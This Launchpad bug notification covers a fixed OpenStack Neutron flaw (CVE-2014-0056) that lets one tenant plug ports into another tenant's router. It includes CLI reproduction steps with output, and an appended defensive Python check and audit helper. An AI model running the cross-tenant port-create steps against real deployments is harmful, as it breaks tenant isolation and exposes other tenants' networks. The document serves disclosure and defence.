** Changed in: neutron
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1243327

Title:
  [OSSA 2014-008] Routers can be cross plugged by other tenants
  (CVE-2014-0056)

Status in OpenStack Neutron (virtual network service):
  Fix Released
Status in neutron grizzly series:
  In Progress
Status in neutron havana series:
  Fix Committed
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  The l3-agent does not check tenant_id and allows for tenants to be
  able to plug ports into others' routers if the device_id is set to
  another tenant's router.

  # become admin tenant
  arosen@arosen-desktop:~/devstack$ source openrc admin admin

  # Create router as admin:
  arosen@arosen-desktop:~/devstack$ neutron router-create admin-router
  Created a new router:
  +-----------------------+--------------------------------------+
  | Field                 | Value                                |
  +-----------------------+--------------------------------------+
  | admin_state_up        | True                                 |
  | external_gateway_info |                                      |
  | id                    | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
  | name                  | admin-router                         |
  | status                | ACTIVE                               |
  | tenant_id             | 04e94acfe69f4960a69c6a78d39466c4     |
  +-----------------------+--------------------------------------+

  # Become demo tenant
  arosen@arosen-desktop:~/devstack$ source openrc demo demo

  # create port with correct device_id and device_owner
  arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface
  Created a new port:
  +-----------------------+---------------------------------------------------------------------------------+
  | Field                 | Value                                                                           |
  +-----------------------+---------------------------------------------------------------------------------+
  | admin_state_up        | True                                                                            |
  | allowed_address_pairs |                                                                                 |
  | device_id             | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600                                            |
  | device_owner          | network:router_interface                                                        |
  | fixed_ips             | {"subnet_id": "5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} |
  | id                    | 895cf428-4bfb-4c79-86c2-d40af9bf3587                                            |
  | mac_address           | fa:16:3e:21:33:6c                                                               |
  | name                  |                                                                                 |
  | network_id            | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7                                            |
  | security_groups       |                                                                                 |
  | status                | DOWN                                                                            |
  | tenant_id             | ad069ea620614cce9c4b6f088d39d03e                                                |
  +-----------------------+---------------------------------------------------------------------------------+

  Now when the l3-agent is restarted or enters its periodic sync state:

  arosen@arosen-desktop:~/devstack$ sudo ip netns exec qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig
  lo        Link encap:Local Loopback
            inet addr:127.0.0.1  Mask:255.0.0.0
            inet6 addr: ::1/128 Scope:Host
            UP LOOPBACK RUNNING  MTU:16436  Metric:1
            RX packets:0 errors:0 dropped:0 overruns:0 frame:0
            TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0
            RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

  qr-895cf428-4b Link encap:Ethernet  HWaddr fa:16:3e:21:33:6c
            inet addr:10.0.0.3  Bcast:10.0.0.255  Mask:255.255.255.0
            inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:4 errors:0 dropped:0 overruns:0 frame:0
            TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0
            RX bytes:300 (300.0 B)  TX bytes:398 (398.0 B)

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1243327/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to     : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp
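The report above says the missing control is a tenant ownership check on the router named by a port's device_id. The following is an added illustration of that check, not Neutron's code or the actual OSSA 2014-008 patch: the Router, Port and Context classes are a hypothetical in-memory stand-in for Neutron's tables and request context, and validate_router_port / find_cross_plugged_ports are invented names. The sample data reuses the router, port and tenant IDs from the report so the rejected request is the one shown there; the audit helper goes slightly beyond the report by scanning already-created ports, which matters because the l3-agent plugs them on its next periodic sync.

```python
"""Illustrative tenant-ownership check for router_interface ports.

Added example, not Neutron's own code. The data model below is a tiny
in-memory stand-in for Neutron's router and port tables, and the function
names are hypothetical.
"""
from dataclasses import dataclass
from typing import Dict, List

# device_owner value used by the port in the bug report
ROUTER_INTERFACE = "network:router_interface"


@dataclass(frozen=True)
class Router:
    id: str
    tenant_id: str


@dataclass(frozen=True)
class Port:
    id: str
    tenant_id: str
    device_id: str
    device_owner: str


@dataclass(frozen=True)
class Context:
    """Caller identity for a port-create request (stand-in for the API context)."""
    tenant_id: str
    is_admin: bool = False


class CrossTenantRouterPort(Exception):
    """Raised when a port names a router the caller's tenant does not own."""


def validate_router_port(ctx: Context, port: Port, routers: Dict[str, Router]) -> None:
    """Reject router_interface ports whose device_id is another tenant's router.

    Admin callers may wire any router; non-admin callers must own the router.
    A device_id that names no known router is rejected as well, instead of
    being left for the l3-agent to act on during its sync.
    """
    if port.device_owner != ROUTER_INTERFACE:
        return  # ownership of other device kinds is out of scope here
    if ctx.is_admin:
        return
    router = routers.get(port.device_id)
    if router is None:
        raise CrossTenantRouterPort(f"unknown router {port.device_id}")
    if router.tenant_id != ctx.tenant_id:
        raise CrossTenantRouterPort(
            f"router {router.id} belongs to tenant {router.tenant_id}, "
            f"not to caller tenant {ctx.tenant_id}")


def find_cross_plugged_ports(ports: List[Port], routers: Dict[str, Router]) -> List[Port]:
    """Audit helper: router_interface ports whose tenant differs from the router's.

    Hits should be reviewed rather than deleted blindly; an admin may have
    wired a port into a tenant router on purpose.
    """
    suspicious = []
    for port in ports:
        if port.device_owner != ROUTER_INTERFACE:
            continue
        router = routers.get(port.device_id)
        if router is None or router.tenant_id != port.tenant_id:
            suspicious.append(port)
    return suspicious


# Constructed sample data using the IDs from the bug report.
ADMIN_ROUTER = Router(id="80ffe19a-649c-4fc9-a0d9-2a3d67c5f600",
                      tenant_id="04e94acfe69f4960a69c6a78d39466c4")
DEMO_PORT = Port(id="895cf428-4bfb-4c79-86c2-d40af9bf3587",
                 tenant_id="ad069ea620614cce9c4b6f088d39d03e",
                 device_id=ADMIN_ROUTER.id,
                 device_owner=ROUTER_INTERFACE)
ROUTERS = {ADMIN_ROUTER.id: ADMIN_ROUTER}


if __name__ == "__main__":
    # The demo tenant's request from the report is refused...
    try:
        validate_router_port(Context(DEMO_PORT.tenant_id), DEMO_PORT, ROUTERS)
    except CrossTenantRouterPort as exc:
        print("rejected:", exc)
    # ...while the router's owner and an admin are allowed through.
    validate_router_port(Context(ADMIN_ROUTER.tenant_id), DEMO_PORT, ROUTERS)
    validate_router_port(Context("anyone", is_admin=True), DEMO_PORT, ROUTERS)
    # An audit of existing ports finds the already-created cross-tenant port.
    for p in find_cross_plugged_ports([DEMO_PORT], ROUTERS):
        print("cross-plugged port:", p.id, "tenant", p.tenant_id, "router", p.device_id)
```

The request-time check is the control the report says is absent; the audit pass is what an operator would run once on a deployment that was exposed before patching, since ports created earlier remain in the database and the l3-agent will still plug them on restart or periodic sync.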